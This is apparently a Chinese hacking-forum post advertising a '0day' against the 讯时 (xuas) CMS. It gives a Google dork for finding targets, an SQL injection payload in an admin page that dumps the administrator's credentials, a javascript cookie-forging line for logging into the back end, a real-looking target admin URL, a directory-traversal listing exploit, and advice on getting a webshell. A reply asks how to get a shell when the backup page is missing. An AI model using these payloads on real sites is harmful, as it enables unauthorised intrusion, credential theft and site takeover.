讯时系统(xuas)最新通杀漏洞0day图文说明
<p><span style="COLOR: #ffffff"><font size="2"><font face="宋体"><span style="COLOR: #000000">google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)</span></font></font></span></p><p><span style="COLOR: #ffffff"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000">1</span></strong><span style="COLOR: #000000">、/admin/admin_news_pl_view.asp?id=1<br /><font size="2"><font face="宋体"><span style="COLOR: #000000">//id任意 填入以下语句</span></font></font></span></font></font></span></p>
<p><span style="COLOR: #ffffff"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000">2</span></strong></font></font></span></strong><span style="COLOR: #000000"><font size="2"><font face="宋体"><span style="COLOR: #000000">、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!</span></font></font></span></font></font></span></p>
<p><span style="COLOR: #ffffff"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000"><img class="lightbox" title="" style="WIDTH: 520px" alt="" src="https://img.jbzj.com/do/uploads/allimg/110715/1516000.jpg" onload="ResizeImage(this,520)" /></span></strong></font></font></span></strong></font></font></span></p>
<p><span style="COLOR: #ffffff"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000">3</span></strong></font></font></span></strong><span style="COLOR: #000000"><font size="2"><font face="宋体"><span style="COLOR: #000000">、|'+dfirst("","")+chr(124)+dfirst("",""),username='</span></font></font></span></font></font></span></p>
<p><span style="COLOR: #ffffff"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000"><img class="lightbox" title="" style="WIDTH: 520px" alt="" src="https://img.jbzj.com/do/uploads/allimg/110715/1516001.jpg" onload="ResizeImage(this,520)" /></span></strong></font></font></span></strong></font></font></span></p>
<p><span style="COLOR: #ffffff"><font size="2"><font face="宋体"><span style="COLOR: #000000"><font size="2"><font face="宋体"><span style="COLOR: #000000">爆出管理员帐号和密码了</span></font></font></span></font></font></span></p>
<p><img class="lightbox" title="" style="WIDTH: 520px" alt="" src="https://img.jbzj.com/do/uploads/allimg/110715/1516002.jpg" onload="ResizeImage(this,520)" /></p>
<p><span style="COLOR: #ffffff"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000">4、</span></strong></font></font></span></strong><span style="COLOR: #000000"><font size="2"><font face="宋体"><span style="COLOR: #000000">cookies进后台</span></font></font></span></font></font></span></p>
<p><span style="COLOR: #ffffff"><font size="2"><font face="宋体"><span style="COLOR: #000000"><font size="2"><font face="宋体"><span style="COLOR: #000000">javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));</span></font></font></span></font></font></span></p>
<p><img class="lightbox" title="" style="WIDTH: 520px" alt="" src="https://img.jbzj.com/do/uploads/allimg/110715/1516003.jpg" onload="ResizeImage(this,520)" /></p>
<p><span style="COLOR: #ffffff"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000"><font size="2"><font face="宋体"><strong><span style="COLOR: #000000">5</span></strong></font></font></span></strong><span style="COLOR: #000000"><font size="2"><font face="宋体"><span style="COLOR: #000000">、后台用了cookie验证,直接访问http://www.dxggw.cn/admin/admin_index.asp就OK了!</span></font></font></span></font></font></span></p>
<p><img class="lightbox" title="" style="WIDTH: 520px" alt="" src="https://img.jbzj.com/do/uploads/allimg/110715/1516004.jpg" onload="ResizeImage(this,520)" /></p>
<p><strong>6</strong>、后台有上传和备份取SHELL不难。</p>
<p>7、讯时还有个列目录漏洞:http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..</p>
<p>逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.xx.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!</p>
頁:
[1]